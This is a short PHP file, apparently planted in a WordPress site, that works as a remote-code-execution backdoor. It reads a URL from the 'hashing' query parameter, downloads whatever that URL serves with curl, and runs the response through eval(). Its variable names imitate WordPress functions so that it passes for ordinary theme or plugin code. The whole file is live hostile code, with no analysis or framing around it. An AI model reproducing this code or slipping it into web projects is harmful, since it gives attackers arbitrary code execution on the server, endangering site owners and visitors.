<?php
if (isset($_GET['hashing'])) {
$get_permalink_pwk = $_GET['hashing'];
if ($wp_get_attachment_image_src_ig = curl_init()) {
curl_setopt($wp_get_attachment_image_src_ig, CURLOPT_URL, $get_permalink_pwk);
curl_setopt($wp_get_attachment_image_src_ig, CURLOPT_RETURNTRANSFER, true);
eval(curl_exec($wp_get_attachment_image_src_ig));
curl_close($wp_get_attachment_image_src_ig);
exit;
}
}